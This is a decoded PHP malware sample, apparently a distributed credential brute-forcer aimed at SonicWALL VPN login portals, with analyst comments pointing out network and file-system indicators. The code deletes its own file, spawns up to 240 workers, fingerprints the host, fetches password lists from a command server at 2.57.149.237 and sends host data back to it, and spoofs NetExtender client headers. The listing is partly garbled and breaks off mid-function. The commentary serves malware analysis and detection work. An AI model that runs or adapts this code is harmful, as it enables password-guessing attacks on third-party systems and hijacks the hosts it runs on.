/* Decoded by unphp.net */
{$_VERSION} {$phpFP}
";
// Startup guard: the script tracks its own worker instances by PID (see the
// pid-list handling further down in this file), so it aborts immediately when
// getmypid() cannot return an integer.
if (getmypid() === false || !is_int( getmypid() ) ) {
exit("!getmypid");
}
// Disabled progress beacon left in by the author. It is commented out here, but
// the host and path are still useful network indicators when hunting for
// related samples.
// file_get_contents('http://2.57.149.237/uniq.php?code=START');
/**
 * Shutdown hook that reports the last PHP error to a remote collector.
 *
 * Reads error_get_last(); when an error is present it adds a symbolic name for
 * the error type, the PHP version and the script's $_VERSION global, then sends
 * the whole record as base64-encoded JSON in the query string of a plain-HTTP
 * GET to 2.57.149.237/collect-errors.php. The error record carries the message
 * and the script path, so the request discloses details of the host to that
 * server. In this listing the register_shutdown_function() call that would
 * install the hook is commented out.
 *
 * @return void
 */
function shutdown() {
global $_VERSION;
$lastError = error_get_last();
// Nothing to report when the run ended without an error.
if (is_null($lastError)) {
return;
}
$errorTypeCode = $lastError['type'];
// Lookup table from the numeric E_* code to its constant name.
$exceptions = array(
E_ERROR => "E_ERROR",
E_WARNING => "E_WARNING",
E_PARSE => "E_PARSE",
E_NOTICE => "E_NOTICE",
E_CORE_ERROR => "E_CORE_ERROR",
E_CORE_WARNING => "E_CORE_WARNING",
E_COMPILE_ERROR => "E_COMPILE_ERROR",
E_COMPILE_WARNING => "E_COMPILE_WARNING",
E_USER_ERROR => "E_USER_ERROR",
E_USER_WARNING => "E_USER_WARNING",
E_USER_NOTICE => "E_USER_NOTICE",
E_STRICT => "E_STRICT",
E_RECOVERABLE_ERROR => "E_RECOVERABLE_ERROR",
E_DEPRECATED => "E_DEPRECATED",
E_USER_DEPRECATED => "E_USER_DEPRECATED",
E_ALL => "E_ALL"
);
if (isset($exceptions[$errorTypeCode])) {
$lastError['typeName'] = $exceptions[$errorTypeCode];
}
$lastError['phpversion'] = phpversion();
$lastError['_v'] = $_VERSION;
// Outbound request carrying the error record. Detection: GET requests to
// /collect-errors.php with a long base64 value in parameter "b".
file_get_contents( 'http://2.57.149.237/collect-errors.php?b=' . base64_encode(json_encode($lastError)) );
}
// The error-reporting hook is not installed in this build (call commented out).
// register_shutdown_function('shutdown');
// Removes PHP's execution time limit so the process can run indefinitely.
set_time_limit(0);
// Environment check: without the curl extension the script deletes its own file
// from disk and exits. Self-deletion on every failure path means a failed run
// leaves no script behind for responders to collect.
if (!function_exists('curl_init') || !function_exists('curl_setopt')) {
unlink(__FILE__);
exit('!curl_init || curl_setopt');
}
// Disabled progress beacon (same host as the other commented-out calls).
// // file_get_contents('http://2.57.149.237/uniq.php?code=WITH_CURL');
// Fallback for PHP builds that lack random_bytes(). It concatenates $len bytes
// drawn from rand(), which is not a cryptographically secure generator, so on
// such hosts every value derived from it is predictable in principle.
if (!function_exists('random_bytes')) {
function random_bytes($len)
{
$str = '';
for ($i=0; $i < $len; $i++) {
$str .= chr( rand(0, 255) );
}
return $str;
}
}
// Environment check: SimpleXML is required; otherwise self-delete and exit.
if (!function_exists('simplexml_load_string')) {
unlink(__FILE__);
exit('!simplexml_load_string');
}
// // file_get_contents('http://2.57.149.237/uniq.php?code=WITH_SIMPLEXML');
// Working directory for the pid-list file: the system temp dir, else /tmp.
$sysTempDir = sys_get_temp_dir();
if ( empty($sysTempDir) || !file_exists($sysTempDir)) {
$sysTempDir = '/tmp';
}
// Abort (and self-delete) when even the fallback directory is missing.
if (!file_exists($sysTempDir)) {
unlink(__FILE__);
exit("sysTempDir($sysTempDir) folder not found");
}
// // file_get_contents('http://2.57.149.237/uniq.php?code=WITH_SYS_TEM_DIR');
// file_get_contents('http://2.57.149.237/uniq.php?code=WITH_VALID_TEST_RESP');
// Host sizing: the CPU count is taken as the number of "cpu MHz" lines in
// /proc/cpuinfo, capped at 192. It stays 0 when the file does not exist.
$countCPUs = 0;
if (file_exists("/proc/cpuinfo")) {
$tmpData = file_get_contents("/proc/cpuinfo");
$countCPUs = substr_count($tmpData, "cpu MHz");
if ($countCPUs > 192) {
$countCPUs = 192;
}
}
// Concurrency ceiling: 2 instances per CPU below 4 CPUs, 10 per CPU otherwise,
// clamped to the range 1..240. A host running this can therefore carry up to
// 240 concurrent PHP processes from the same script.
if ($countCPUs < 4) {
$maxCountPids = $countCPUs * 2;
}else{
$maxCountPids = $countCPUs * 10;
}
if ($maxCountPids < 1) {
$maxCountPids = 1;
}
if ($maxCountPids > 240) {
$maxCountPids = 240;
}
// end define maxCountPids
// Register this instance: load the list of live instances, append our PID, and
// delete the script file from disk. From here on the process runs without a
// backing file; a PHP process whose script path no longer exists is a strong
// host-side indicator.
$pids = getPids();
$pids[] = getmypid();
unlink(__FILE__);
if (count($pids) > $maxCountPids ) {
exit("pids too many
");
}
// The pid list is stored as a JSON array under a fixed file name in the temp
// directory; that name is a stable file-system indicator for this sample.
$pidsFP = $sysTempDir . '/jobs-JnfhngkJhgtt.pids';
$b = file_put_contents($pidsFP, json_encode($pids));
if ($b === false) {
exit("Error file_put_contents pidsFP");
}
// end default run process
// Connectivity check. The original comment called this "check google", but the
// request goes through curl_get_data() to /test.php on one of the hosts in
// $_ROUTERS (defined outside this view) and expects JSON with "status": true.
$resp = curl_get_data('/test.php', 1);
$resp = json_decode($resp, true);
if ( !isset($resp['status']) || $resp['status'] !== true) {
unlink(__FILE__);
exit("curl invalid.
");
}
echo "Ok
";
// end connectivity check
// main process
/*
$isMainProccess = true;
if (isset($argv[1])) {
$isMainProccess = false;
}
$pidsFP = $sysTempDir . '/jobs-JnfhngkJhgtt.pids';
if (function_exists('shell_exec')) {
// file_get_contents('http://2.57.149.237/uniq.php?code=SHELL_EXEC_STARTS');
if ($isMainProccess) {
// file_get_contents('http://2.57.149.237/uniq.php?code=SHELL_EXEC_STARTS_MAIN_PROC');
$pidMainProccesFP = $sysTempDir . '/jobs-JnfhngkJhgtt-main.pid';
if (file_exists($pidMainProccesFP)) {
$pidMainProcces = (int) file_get_contents($pidMainProccesFP);
if (file_exists("/proc/{$pidMainProcces}")) {
if (file_exists("/proc/{$pidMainProcces}/cmdline")) {
$cmdline = file_get_contents("/proc/{$pidMainProcces}/cmdline");
if (stripos($cmdline, $phpFP) !== false) {
// file_get_contents('http://2.57.149.237/uniq.php?code=SHELL_EXEC_ISSET_main_PROCC2');
exit("Isset main proccess
");
}
}else{
// file_get_contents('http://2.57.149.237/uniq.php?code=SHELL_EXEC_ISSET_main_PROCC');
exit("Isset main proccess
");
}
}
}
$b = file_put_contents($pidMainProccesFP, getmypid());
if ($b === false) {
// file_get_contents('http://2.57.149.237/uniq.php?code=SHELL_EXEC_ERR3');
exit("Error file_put_contents pidMainProccesFP");
}
$pids = getPids();
$countChildsToRun = $maxCountPids - count($pids);
echo "+ countChildsToRun($countChildsToRun) run pids(". count($pids) .")
";
for ($childProcIndex = 0; $childProcIndex < $countChildsToRun; $childProcIndex++) {
$childPid = shell_exec("/usr/local/bin/php {$phpFP} $childProcIndex > /dev/null 2>&1 & echo $!;");
if ($childPid) {
$childPid = (int) trim($childPid);
}
if (is_numeric($childPid) && $childPid > 0) {
$pids[] = $childPid;
echo "> run child($childProcIndex) $childPid
";
$b = file_put_contents($pidsFP, json_encode($pids));
if ($b === false) {
// file_get_contents('http://2.57.149.237/uniq.php?code=SHELL_EXEC_ERR2');
exit("Error file_put_contents pidsFP");
}
}else{
// file_get_contents('http://2.57.149.237/uniq.php?code=SHELL_EXEC_ERR');
}
sleep( rand(3, 12) );
}
unlink(__FILE__);
exit( "Main proccess done
");
}
}else{
// file_get_contents('http://2.57.149.237/uniq.php?code=shell_exec_NOT_ISSET');
$pids = getPids();
$pids[] = getmypid();
unlink(__FILE__);
if (count($pids) > $maxCountPids ) {
// file_get_contents('http://2.57.149.237/uniq.php?code=MAINPROCEES_PIDS_TOO_MANY');
exit("pids too many
");
}
$b = file_put_contents($pidsFP, json_encode($pids));
if ($b === false) {
exit("Error file_put_contents pidsFP");
}
}
// end main process
// child proccess
if (!$isMainProccess) {
$pids = getPids();
if (count($pids) > $maxCountPids ) {
// file_get_contents('http://2.57.149.237/uniq.php?code=CHILD_PIDS_TOO_MANY');
exit("pids too many
");
}
}
// end child proccess
// file_get_contents('http://2.57.149.237/uniq.php?code=WITH_SUCCESS_RUN_CHILD');
*/
/**
 * Returns the PIDs of instances of this script that still appear to be running.
 *
 * Loads the JSON array stored in <temp dir>/jobs-JnfhngkJhgtt.pids (an empty
 * list when the file is absent) and drops every entry that is not numeric, is
 * below 1, has no /proc/<pid> directory, or whose /proc/<pid>/cmdline does not
 * contain $phpFP (case-insensitive). An entry whose /proc/<pid> exists but has
 * no cmdline file is kept. Terminates the whole script when the file content
 * does not decode to an array.
 *
 * $phpFP is set outside this view; presumably it is the script's own path --
 * confirm against the start of the file.
 *
 * @return array Re-indexed list of unique PIDs.
 */
function getPids()
{
global $sysTempDir, $phpFP;
$pidsFP = $sysTempDir . '/jobs-JnfhngkJhgtt.pids';
if (file_exists($pidsFP)) {
$pids = file_get_contents($pidsFP);
$pids = json_decode($pids, true);
if (!is_array($pids)) {
exit("pids empty format.");
}
}else{
$pids = array();
}
foreach($pids as $pidKey => $pid){
// Discard anything that cannot be a PID.
if (!is_numeric($pid) || $pid < 1) {
unset($pids[$pidKey]);
continue;
}
// Liveness check through procfs.
if (!file_exists("/proc/{$pid}")) {
unset($pids[$pidKey]);
}else{
if ( file_exists("/proc/{$pid}/cmdline") ){
// Guards against PID reuse: the process must have been started with
// a command line that mentions $phpFP.
$cmdline = file_get_contents("/proc/{$pid}/cmdline");
if (stripos($cmdline, $phpFP) === false) {
unset($pids[$pidKey]);
}
}
}
}
// $pids is always an array at this point; this check cannot fire.
if (!is_array($pids)) {
$pids = array();
}
$pids = array_unique($pids);
$pids = array_values($pids);
return $pids;
}
/**
 * Collects name/value attribute pairs from chunks of a response body.
 *
 * NOTE(review): this function is damaged in the decoded listing. The search
 * needle in the stripos() call is an empty string, $pp is read before it is
 * assigned, $ppEnd is never assigned, and $ppStart is never used. Marker
 * literals and at least one statement were most likely lost when the page was
 * extracted, so the text below does not show the original logic -- confirm
 * against an undamaged copy before drawing conclusions from it.
 *
 * What remains visible: up to 100 iterations, each taking a substring that
 * starts 6 bytes after $pp and ends at $ppEnd, reading name="..." and
 * value="..." from it with getValueBetween(), and storing the value as a
 * string under the name when the name is non-empty.
 *
 * @param string $resp Response body to scan.
 * @return array Map of attribute name to value string.
 */
function getInputData($resp)
{
$inputData = array();
$ppStart = 0;
$count = 0;
do{
$count++;
// Garbled by extraction: empty needle, and $pp used as its own offset.
$pp = stripos($resp, '', $pp);
// $ppEnd has no visible assignment.
if ($ppEnd === false) {
continue;
}
$inputStr = substr($resp, $pp + 6, $ppEnd - $pp - 6);
// var_dump($inputStr);
$name = getValueBetween($inputStr, 'name="', '"');
$value = getValueBetween($inputStr, 'value="', '"');
if ( !empty($name) ) {
$inputData[$name] = (string) $value;
}
}while($count < 100);
return $inputData;
}
/**
 * Returns the text found between the first occurrence of $from and the next
 * occurrence of $to after it.
 *
 * @param string $str  Text to search.
 * @param string $from Opening delimiter.
 * @param string $to   Closing delimiter.
 * @return string|false The enclosed text, or false when either delimiter is missing.
 */
function getValueBetween($str, $from, $to)
{
    $openAt = strpos($str, $from);
    if ($openAt === false) {
        return false;
    }
    // First byte after the opening delimiter.
    $contentStart = $openAt + strlen($from);
    $closeAt = strpos($str, $to, $contentStart);
    if ($closeAt === false) {
        return false;
    }
    return substr($str, $contentStart, $closeAt - $contentStart);
}
/**
 * Returns a lowercase hexadecimal string built from ceil($len / 2) random bytes.
 * For an odd $len the result is one character longer than $len.
 *
 * @param int $len Requested number of hex characters.
 * @return string
 */
function generate_random_hex($len){
    $byteCount = ceil($len / 2);
    $raw = random_bytes($byteCount);
    return bin2hex($raw);
}
/**
 * Returns a random value formatted like a MAC address: six two-character hex
 * groups joined with "-". The value comes from generate_random_hex(), so it is
 * made up and does not describe any real interface of the host.
 *
 * @return string
 */
function generate_mac_address(){
    $hex = generate_random_hex(12);
    $octets = str_split($hex, 2);
    return implode("-", $octets);
}
/**
 * Converts an XML string to a nested PHP array by parsing it with SimpleXML
 * (CDATA merged into text nodes) and round-tripping the result through JSON.
 * Parser warnings are suppressed with "@"; input that fails to parse becomes
 * the JSON value false and is returned as array(false).
 *
 * @param string $xmlstring XML document text.
 * @return array
 */
function xml_to_arr($xmlstring){
    $parsed = @simplexml_load_string($xmlstring, "SimpleXMLElement", LIBXML_NOCDATA);
    $asJson = json_encode($parsed);
    $decoded = json_decode($asJson, TRUE);
    return (array) $decoded;
}
/**
 * Parses the first 256 bytes of /proc/meminfo into a map of field name to the
 * integer that starts the field's value.
 *
 * @return array|false Parsed fields, or false when /proc/meminfo does not exist.
 */
function getMemInfo()
{
    if (!file_exists("/proc/meminfo")) {
        return false;
    }
    // Only the head of the file is read; a line cut off by the 256-byte limit
    // is still parsed when it contains exactly one colon.
    $head = substr( file_get_contents("/proc/meminfo"), 0, 256 );
    // The separator is a literal line break inside the quotes, exactly as it
    // appears in the decoded listing.
    $lines = explode("
", $head);
    $parsed = array();
    foreach ($lines as $line) {
        $pair = explode(":", $line);
        if (count($pair) == 2) {
            $parsed[trim($pair[0])] = (int) trim($pair[1]);
        }
    }
    return $parsed;
}
/**
 * Returns the next entry of the global $_ROUTERS array.
 *
 * Despite the name, nothing here is random: the function advances the array's
 * internal pointer and rewinds to the first element when next() returns false,
 * so successive calls cycle through the list in order. $_ROUTERS is defined
 * outside this view; curl_get_data() uses the returned value as the host part
 * of an http:// URL.
 *
 * @return mixed Current element of $_ROUTERS.
 */
function get_random_router_ip()
{
global $_ROUTERS;
// The pointer lives on the global array, so the position persists across calls.
if (next($_ROUTERS) === false) {
reset($_ROUTERS);
}
return current($_ROUTERS);
}
/**
 * Sends a GET request for $query to one of the operator's relay hosts and
 * returns the response body.
 *
 * Host selection: a query containing "/valid-items.php" always goes to
 * $_ROUTER_MAIN; every other query goes to the next host from
 * get_random_router_ip(). Both globals are defined outside this view. The URL
 * is built as "http://" . host . query, so the traffic is unencrypted and the
 * two CURLOPT_SSL_VERIFY* settings have no effect on it.
 *
 * Network indicators visible here: a fixed "User-Agent: curl/8.1" header,
 * "Accept-Encoding: gzip" when gzdecode() exists, redirects not followed, and
 * 30-second connect and total timeouts.
 *
 * The request is repeated up to $maxTryes times until one attempt returns HTTP
 * 200. When no attempt returns 200, the body of the last attempt is still
 * returned unless curl_exec() itself failed.
 *
 * @param string $query    Path and query string appended to the host.
 * @param int    $maxTryes Maximum number of attempts.
 * @return string|false Response body (gunzipped when the response headers
 *                      announce gzip), or false when the last curl_exec() failed.
 */
function curl_get_data($query='', $maxTryes = 5 )
{
global $_ROUTER_MAIN;
$headers = array(
'User-Agent: curl/8.1',
);
if (function_exists('gzdecode')) {
$headers[] = 'Accept-Encoding: gzip';
}
for ($i = 0; $i < $maxTryes; $i++) {
// Result submissions are pinned to the main host; other calls rotate hosts.
if (stripos($query, '/valid-items.php') === false ) {
$remote_ip = get_random_router_ip();
}else{
$remote_ip = $_ROUTER_MAIN;
}
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://" . $remote_ip . $query);
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
// Headers are included in the output so the body can be split off by size below.
curl_setopt($ch, CURLOPT_HEADER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, false);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 30);
curl_setopt($ch, CURLOPT_TIMEOUT, 30);
$response = curl_exec($ch);
// NOTE(review): the next two lines are a commented-out debug echo that the
// decoder split at its embedded line break; as printed, the second of them
// is no longer inside the comment.
// echo "+ respons(". strlen($response) .")
";
$httpcode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
$header_size = curl_getinfo($ch, CURLINFO_HEADER_SIZE);
$header = substr($response, 0, $header_size);
$resp = substr($response, $header_size);
curl_close($ch);
if ($response !== false && $httpcode == 200) {
break;
}
}
if ($response === false) {
return false;
}
// unpack data
if (stripos($header, 'Content-Encoding: gzip') !== false) {
return gzdecode($resp);
}else{
return $resp;
}
}
// Host fingerprint: the kernel version string from /proc/version. It is sent
// to the operator's server with every job request in the loop below (field
// "procVersion").
$procVersion = trim(file_get_contents('/proc/version'));
// Disabled start-up jitter (random 5-60 s sleep), kept as found.
/*
$sleepWhenStartSec = rand(5, 60);
echo "+ sleepWhenStartSec($sleepWhenStartSec)
";
sleep($sleepWhenStartSec);
*/
// Counter checked at the top of the main loop, which stops once it reaches 10.
$countEmptyJobData = 0;
while (true) {
if ($countEmptyJobData >= 10) {
break;
}
/*
$sleepSec = rand(5, 30);
echo "Sleep time: $sleepSec
";
sleep($sleepSec);
*/
$count_pids = count( getPids() );
echo "+ count_pids($count_pids)
";
$meminfo = getMemInfo();
if (isset($meminfo['MemAvailable'])) {
$MemAvailable = $meminfo['MemAvailable'] / 1000;
// check
if ($MemAvailable < 500) {
// file_get_contents('http://2.57.149.237/uniq.php?code=MemAvailable_TOO_SMALL');
exit("MemAvailable too small
");
}
}else{
$MemAvailable = false;
}
$memPeak = memory_get_peak_usage() / 1000000;
// echo "- MemAvailable(". number_format($MemAvailable) ." Mb)
";
// echo "- memPeak(". number_format($memPeak) ." mb)
";
$getItemsUrlData = array(
'version' => $_VERSION,
"countCPUs" => $countCPUs,
"count_pids" => $count_pids,
"phpversion" => (float) phpversion(),
"simplexml_load_string" => function_exists('simplexml_load_string'),
"MemAvailable" => $MemAvailable,
"memPeak" => $memPeak,
"procVersion" => $procVersion,
);
$getItemsTMStart = microtime(true);
$itemsData = curl_get_data( '/get-items.php?b=' . base64_encode(json_encode($getItemsUrlData)), 1 );
$getItemsExecTime = microtime(true) - $getItemsTMStart;
echo "+ getItemsExecTime($getItemsExecTime)
";
echo "+ itemsData(". strlen($itemsData) ." bytes)
";
$itemsData = (array) json_decode($itemsData, true);
if (!empty($itemsData['jd'])) {
$data = $itemsData['jd'];
}else{
$data = false;
}
if ( isset($data['id']) ) {
$countEmptyJobData = 0;
$tmJobStart = microtime(true);
$jobCountProcedPasswds = 0;
$jobSign = $itemsData['js'];
$passwd_offset = $data['po'];
$generated_passwd_offset = (int) $data['gpo'];
$passwds = (array) $itemsData['pp'];
$generatedPasswds = (array) $itemsData['gp'];
$itemDataForBadRequest = array(
'id' => $data['id'],
"jobSign" => $jobSign,
);
echo "+ passwds(". count($passwds) .")
";
echo "+ generatedPasswds(". count($generatedPasswds) .")
";
$server_ip = long2ip($data['si']);
$hasBadResp = false;
$foundValidCreds = false;
// start type 2
if ($data['ti'] == 2 ){
$headers = array(
'User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:102.0) Gecko/20100101 Firefox/102.0',
'Accept: */*',
'Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3',
'Pragma: no-cache',
'Cache-Control: no-store, no-cache, must-revalidate',
'If-Modified-Since: Sat, 1 Jan 2000 00:00:00 GMT',
'Content-Type: text/plain;charset=UTF-8',
'Sec-Fetch-Dest: empty',
'Sec-Fetch-Mode: cors',
'Sec-Fetch-Site: same-origin',
);
$headers_sonic = array(
'User-Agent: SonicWALL NetExtender for Windows 10.2.339 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1) x86_64',
"Client-Name: NetExtender Windows Client",
"Client-Version: 10.2.339",
"X-NE-SESSIONPROMPT: true",
"X-NE-pda: true",
'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
'Accept-Language: en-us',
// 'Referer: '. $schema_ip .'/cgi-bin/welcome',
'Content-Type: application/x-www-form-urlencoded',
// 'Origin: ' . $schema_ip,
'Connection: keep-alive',
'Upgrade-Insecure-Requests: 1',
);
$ch = curl_init();
$schema_ip = "https://{$server_ip}:{$data['sp']}";
$url = $schema_ip;
echo "~ $url
";
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
$resp = curl_exec($ch);
$pageDomains = array();
$tmpDomainsStr = getValueBetween($resp, "name='domain'", "");
if (!empty($tmpDomainsStr)) {
$domainsArr = explode("
", $tmpDomainsStr);
foreach($domainsArr as $domainsArrItem){
if (stripos($domainsArrItem, '